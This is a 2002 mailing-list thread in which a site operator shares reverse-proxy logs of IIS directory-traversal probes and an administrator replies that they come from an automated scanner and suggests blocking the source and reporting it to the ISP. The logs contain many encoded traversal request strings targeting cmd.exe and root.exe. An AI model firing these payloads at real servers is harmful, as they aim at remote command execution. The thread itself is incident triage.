If you check the time constraints between each attempted security circumvention scan; you will see that they are very close. Almost assuredly, it is from an automated vulnerability scanner. My guess would be that they probably are not using a Linux binary such as nessus, or ISS. Because they are obviously not educated enough to be able to determien a win32 system from a Linux box?! Figures! None of the posted vulnerabilities are recent. add them to hosts.deny..and send an email to their ISP at registry@isp.iberbanda.es,ricardo.ponce@iberbanda.es, or maybe abuse@iberbanda.es. HTH. Thomas Jones i-Null.com Network Administrator On Thursday 10 October 2002 17:11, mailinglists@belfin.ch wrote:
Hello
our reverse proxy picked this up
1034211881.427 22 217.11.99.90 TCP_MISS/503 1166 GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe? - NONE/- - 1034211881.925 13 217.11.99.90 TCP_MISS/503 1166 GET http://www/scripts/..%c0%2f../winnt/system32/cmd.exe? - NONE/- - 1034211882.393 19 217.11.99.90 TCP_MISS/503 1166 GET http://www/scripts/..%c0%af../winnt/system32/cmd.exe? - NONE/- - 1034211882.852 10 217.11.99.90 TCP_MISS/503 1166 GET http://www/scripts/..%c1%9c../winnt/system32/cmd.exe? - NONE/- - 1034211883.297 5 217.11.99.90 TCP_MISS/503 1168 GET http://www/scripts/..%%35%63../winnt/system32/cmd.exe? - NONE/- - 1034211883.836 20 217.11.99.90 TCP_MISS/503 1164 GET http://www/scripts/..%%35c../winnt/system32/cmd.exe? - NONE/- - 1034211887.664 22 217.11.99.90 TCP_MISS/503 1172 GET http://www/scripts/..%25%35%63../winnt/system32/cmd.exe? - NONE/- - 1034211888.285 19 217.11.99.90 TCP_MISS/503 1164 GET http://www/scripts/..%252f../winnt/system32/cmd.exe? - NONE/- - 1034215688.223 16 217.11.99.90 TCP_MISS/503 1116 GET http://www/scripts/root.exe? - NONE/- - 1034215689.027 29 217.11.99.90 TCP_MISS/503 1112 GET http://www/MSADC/root.exe? - NONE/- - 1034215689.564 13 217.11.99.90 TCP_MISS/503 1132 GET http://www/c/winnt/system32/cmd.exe? - NONE/- - 1034215690.138 3 217.11.99.90 TCP_MISS/503 1132 GET http://www/d/winnt/system32/cmd.exe? - NONE/- - 1034215690.962 20 217.11.99.90 TCP_MISS/503 1164 GET http://www/scripts/..%255c../winnt/system32/cmd.exe? - NONE/- - 1034215691.552 27 217.11.99.90 TCP_MISS/503 1206 GET http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe? - NONE/- - 1034215692.265 19 217.11.99.90 TCP_MISS/503 1206 GET http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe? - NONE/- - 1034215693.017 10 217.11.99.90 TCP_MISS/503 1262 GET http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c . ./winnt/s
Is there some new IIS/Windows worm spreading?
Thanks, Philipp